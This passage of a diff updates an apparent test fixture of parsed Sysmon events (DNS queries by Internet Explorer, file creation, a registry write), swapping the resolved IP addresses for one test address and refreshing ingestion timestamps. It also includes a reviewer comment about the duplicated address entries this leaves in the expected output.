Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -147,12 +147,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { 
@@ -169,13 +169,13 @@ "www.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741007600Z", + "ingested": "2021-12-09T13:50:23.456580900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", 
@@ -253,7 +253,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741013100Z", + "ingested": "2021-12-09T13:50:23.456586700Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T08:14:44.489978500Z'/\u003e\u003cEventRecordID\u003e612\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 08:14:44.489\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-c36f-5eb3-2c07-290000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2184\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\.gvm\\versions\\go1.13.10.windows.amd64\\bin\\go.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\1\\go-build583768550\\b001\\test.test.exe\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=199E1CF5B2250BD515ECCCF4CA686301,IMPHASH=D90D8C7812AEC8DA0FA173AFA1293AB2\u003c/Data\u003e\u003cData Name='IsExecutable'\u003etrue\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -319,17 +319,17 @@ "type": "CNAME" }, { - "data": "23.50.53.192", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
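Review bot: Substituting the same address for every A record leaves `resolved_ip` in this hunk as `["89.160.20.156", "89.160.20.156"]` while the `related.ip` array in the following hunk collapses to a single entry, so the regenerated expectation now freezes a duplicate-vs-deduplicated asymmetry that the original fixture, with two distinct addresses, did not have. If the goal is only to stay inside the GeoIP-supported test subset, giving the sample log two different addresses from that subset would keep the multi-answer resolution path covered without pinning duplicated entries into the expected output. The same pattern recurs in the hunks starting at `@@ -420`, `@@ -752` and `@@ -955`. The enclosing event object begins and ends outside this hunk.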
@@ -345,14 +345,13 @@ "static-global-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741020600Z", + "ingested": "2021-12-09T13:50:23.456592500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -420,17 +419,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -447,14 +446,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741030Z", + "ingested": "2021-12-09T13:50:23.456598Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", 
@@ -520,7 +518,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741038400Z", + "ingested": "2021-12-09T13:50:23.456603600Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:40.599567200Z'/\u003e\u003cEventRecordID\u003e2682\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:40.589\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 1\u003c/Data\u003e\u003cData Name='Details'\u003eDWORD (0x00000004)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -595,7 +593,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741043100Z", + "ingested": "2021-12-09T13:50:23.456609200Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T07:27:18.722136100Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 07:27:18.722\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-b2b6-5eb3-18ab-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e776\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\LOCAL SERVICE\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\lastalive0.dat\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=115106F5B338C87AE6836D50DD890DE3DA296367\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -665,12 +663,12 @@ "type": "CNAME" }, { - "data": "23.64.104.249", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "network": { 
@@ -687,13 +685,13 @@ "linkmaker.itunes.apple.com" ], "ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741047500Z", + "ingested": "2021-12-09T13:50:23.456616900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", 
@@ -752,27 +750,27 @@ }, "answers": [ { - "data": "151.101.1.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.65.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.129.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.193.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -787,16 +785,13 @@ "confiant-integrations.global.ssl.fastly.net" ], "ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741051400Z", + "ingested": "2021-12-09T13:50:23.456622700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": 